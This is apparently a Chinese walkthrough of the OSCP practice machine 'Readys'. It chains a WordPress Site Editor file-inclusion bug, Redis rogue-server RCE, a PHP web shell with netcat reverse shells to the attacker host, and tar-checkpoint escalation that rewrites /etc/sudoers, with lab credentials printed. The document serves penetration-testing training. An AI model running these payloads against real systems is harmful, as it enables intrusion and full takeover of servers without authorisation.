OSCP官方靶场 Readys WP
关注泷羽Sec和泷羽Sec-静安公众号,这里会定期更新与 OSCP、渗透测试等相关的最新文章,帮助你理解网络安全领域的最新动态。后台回复“OSCP配套工具”获取本文的工具
官网打开靶场
信息收集
# Kali攻击机地址
192.168.45.182
# 靶机地址
192.168.147.166扫描端口和目录
# 设置MTU
sudo ip link set dev tun0 mtu 1250
ip link show tun0
# 扫描端口
ports=$(sudo nmap -p- --min-rate=5000 -Pn 192.168.147.166 | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
echo $ports
# 扫描服务
sudo nmap -sT -sC -sV -O -Pn -p$ports 192.168.147.166
sudo nmap --script=vuln -p$ports -Pn 192.168.147.166
# 扫描目录
gobuster dir -e -u http://192.168.147.166 -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -t 20 -x php,html,txt -b 403,500,404 -z
whatweb http://192.168.147.166/
wpscan --update --url http://192.168.147.166/ --enumerate ap,t,u --api-token XXX扫描结果如下:
┌──(kali㉿kali)-[~/Desktop/Readys]
└─$ echo $ports
22,80,6379
┌──(kali㉿kali)-[~/Desktop/Readys]
└─$ sudo nmap -sT -sC -sV -O -Pn -p$ports 192.168.147.166
Starting Nmap 7.95 ( https://nmap.org ) at 2025-10-15 05:12 EDT
Nmap scan report for 192.168.147.166
Host is up (0.12s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 74:ba:20:23:89:92:62:02:9f:e7:3d:3b:83:d4:d9:6c (RSA)
| 256 54:8f:79:55:5a:b0:3a:69:5a:d5:72:39:64:fd:07:4e (ECDSA)
|_ 256 7f:5d:10:27:62:ba:75:e9:bc:c8:4f:e2:72:87:d4:e2 (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-title: Readys – Just another WordPress site
|_http-generator: WordPress 5.7.2
|_http-server-header: Apache/2.4.38 (Debian)
6379/tcp open redis Redis key-value store
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|router
Running: Linux 4.X|5.X, MikroTik RouterOS 7.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3
OS details: Linux 4.15 - 5.19, Linux 5.0 - 5.14, MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3)
Network Distance: 4 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 42.97 seconds
┌──(kali㉿kali)-[~/Desktop/Readys]
└─$ sudo nmap --script=vuln -p$ports -Pn 192.168.147.166
Starting Nmap 7.95 ( https://nmap.org ) at 2025-10-15 05:18 EDT
Nmap scan report for 192.168.147.166
Host is up (0.12s latency).
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
| http-csrf:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.147.166
| Found the following possible CSRF vulnerabilities:
|
| Path: http://192.168.147.166:80/
| Form id: search-form-1
| Form action: http://192.168.147.166/
|
| Path: http://192.168.147.166:80/index.php/category/uncategorised/
| Form id: search-form-1
| Form action: http://192.168.147.166/
|
| Path: http://192.168.147.166:80/index.php/comments/feed/1quot;https:/gravatar.com">Gravatar</a>.]]
| Form id: search-form-2
| Form action: http://192.168.147.166/
|
| Path: http://192.168.147.166:80/index.php/comments/feed/1quot;https:/gravatar.com">Gravatar</a>.]]
| Form id: search-form-1
|_ Form action: http://192.168.147.166/
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-sql-injection: ERROR: Script execution failed (use -d to debug)
| http-fileupload-exploiter:
|
| Couldn't find a file-type field.
|
|_ Couldn't find a file-type field.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-wordpress-users:
| Username found: admin
|_Search stopped at ID #25. Increase the upper limit if necessary with 'http-wordpress-users.limit'
| http-enum:
| /wp-login.php: Possible admin folder
| /readme.html: Wordpress version: 2
| /: WordPress version: 5.7.2
| /wp-includes/images/rss.png: Wordpress version 2.2 found.
| /wp-includes/js/jquery/suggest.js: Wordpress version 2.5 found.
| /wp-includes/images/blank.gif: Wordpress version 2.6 found.
| /wp-includes/js/comment-reply.js: Wordpress version 2.7 found.
| /wp-login.php: Wordpress login page.
| /wp-admin/upgrade.php: Wordpress login page.
|_ /readme.html: Interesting, a readme.
6379/tcp open redis
Nmap done: 1 IP address (1 host up) scanned in 118.67 seconds
┌──(kali㉿kali)-[~/Desktop/Readys]
└─$ whatweb http://192.168.147.166/
http://192.168.147.166/ [200 OK] Apache[2.4.38], Country[RESERVED][ZZ], HTML5, HTTPServer[Debian Linux][Apache/2.4.38 (Debian)], IP[192.168.147.166], JQuery[3.5.1], MetaGenerator[WordPress 5.7.2], PoweredBy[--], Script[text/javascript], Title[Readys – Just another WordPress site], UncommonHeaders[link], WordPress[5.7.2]
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/wp-contentwp-content (Status: 301) [Size: 323] [--> http://192.168.147.166/wp-content/]
/wp-includeswp-includes (Status: 301) [Size: 324] [--> http://192.168.147.166/wp-includes/]
/wp-adminwp-admin (Status: 301) [Size: 321] [--> http://192.168.147.166/wp-admin/]
发现存在用户名admin,但是密码爆不出来。
site-editor插件漏洞
| [!] Title: Site Editor <= 1.1.1 - Local File Inclusion (LFI)
| References:
| - https://wpscan.com/vulnerability/4432ecea-2b01-4d5c-9557-352042a57e44
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7422
| - https://seclists.org/fulldisclosure/2018/Mar/40
| - https://github.com/SiteEditor/editor/issues/2
利用成功,发现有一个叫alice的用户,按照靶机的设置习惯,alice用户下面应该有一个flag,flag的文件名一般是local.txt,而root下面还有一个叫proof.txt的文件
想直接看ssh密钥的,复制下来直接登录,但是ssh密钥看不了,只能看一下redis的配置
/root/.ssh/id_rsa
/home/alice/.ssh/id_rsa
/etc/redis/redis.conf
cat 166redis.conf |grep "requirepass"
得到redis的认证密码是Ready4Redis
redis-cli -h 192.168.147.166 -a 'Ready4Redis?'
info server
Redis-RCE 漏洞反弹shell
git clone https://hk.gh-proxy.com/https://github.com/n0b0dyCN/redis-rogue-server.git
git clone https://hk.gh-proxy.com/https://github.com/Ridter/redis-rce.git
cd redis-rce
cp ../redis-rogue-server/exp.so .
# 新开一个终端等待反弹
rlwrap -cAr nc -nlvp 80
# 执行RCE脚本
python redis-rce.py -r 192.168.147.166 -L 192.168.45.182 -P 6379 -f exp.so -a 'Ready4Redis?'
python3 -c 'import pty;pty.spawn("/bin/bash")'
找到数据库配置
[!tip] 数据库密码 karl Wordpress1234
文件权限php一句话木马
但是目前的redis账户还是不能直接登录,要找一个正经的用户。
查找可以写的目录,然后把php一句话木马写上去。在各个⽬录尝试写⼊ echo "<?php phpinfo() ?>" > test.php ,/run/redis⽬录写⼊之后在使⽤LFI之后php会被解析,尝试写⼊⼀个⼀句话⽊⻢
echo '<?php system($_GET["cmd"]); ?>' > test.php
find / -type d -maxdepth 5 -writable 2>/dev/null
# kali 新建一个监听终端
rlwrap -cAr nc -nlvp 443
# 访问LFI地址
http://192.168.147.166/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/run/redis/test.php&cmd=busybox%20nc%20192.168.45.182%20443%20-e%20sh
busybox nc 192.168.45.182 443 -e sh
# 美化终端
python3 -c 'import pty;pty.spawn("/bin/bash")'
连上数据库得到WP的管理员密码,但是这个密码对我们之后的提权没有用了已经。
admin | $P$Ba5uoSB5xsqZ5GFIbBnOkXA0ahSJnb0 上传小豌豆查一下提权的点
查看/usr/local/bin/backup.sh文件的内容,发现可以用tar提权。详见[[OSCP官方靶场-Amaterasu WP#Tar提权详解]]-CNSD
tar提权
cd /var/www/html
echo "" > '--checkpoint=1'
echo "" > '--checkpoint-action=exec=sh payload.sh'
# kali
echo "echo 'alice ALL=(root) NOPASSWD: ALL' > /etc/sudoers" >payload.sh
chmod +x payload.sh
python3 -m http.server
# 靶机
wget 192.168.45.182:8080/payload.sh
sudo -l
sudo /bin/bash
提权成功,拿到flag。
总结
入侵路径示意图
flowchart TD
%% 资产列表
A[Kali攻击机 <br> 192.168.45.182]
B[靶机 <br> 192.168.147.166]
C[WP插件site-editor 文件读取漏洞]
D[Redis-RCE漏洞]
E[文件读取漏洞综合利用提升为Alice]
F[Tar提权root]
%% 路径关系
A-->|扫描|B
B-->C
C-->D
D-->E
E-->F
%% 线型:---(实线)、-.->(虚线)、==>(粗箭头)
%% -->|是|:带条件文本的连接
%% 矩形节点[ ],菱形决策节点{ },圆弧方节点()
%% 样式定义
classDef attack fill:#ffcccc,stroke:#ff0000,stroke-width:2px;
classDef public fill:#ffeecc,stroke:#ff9900,stroke-width:2px;
classDef internal fill:#ccffcc,stroke:#009900,stroke-width:2px;
%% 线型与颜色方案(亮色/暗色通用)
linkStyle default stroke:#666666,stroke-width:2px,stroke-dasharray:0;
%% 应用样式
class A attack;
class B,C,D public;
class E,F internal;
入侵时间表
gantt
title 攻击时间表
dateFormat YYYY-MM-DD HH:mm
axisFormat %H:%M
section 侦察阶段
目标扫描 :a1, 2025-10-15 17:05, 2025-10-15 17:51
漏洞识别 :a2, after a1, 15m
section 攻击阶段
初始访问 :b1, after a2, 2025-10-15 19:05
权限提升 :crit,b2, after b1, 35m
section 后渗透阶段
数据窃取 :c1, after b2, 5m
🔔 想要获取更多网络安全与编程技术干货?
关注 泷羽Sec-静安 公众号,与你一起探索前沿技术,分享实用的学习资源与工具。我们专注于深入分析,拒绝浮躁,只做最实用的技术分享!💻
马上加入我们,共同成长!🌟
👉 长按或扫描二维码关注公众号
直接回复文章中的关键词,获取更多技术资料与书单推荐!📚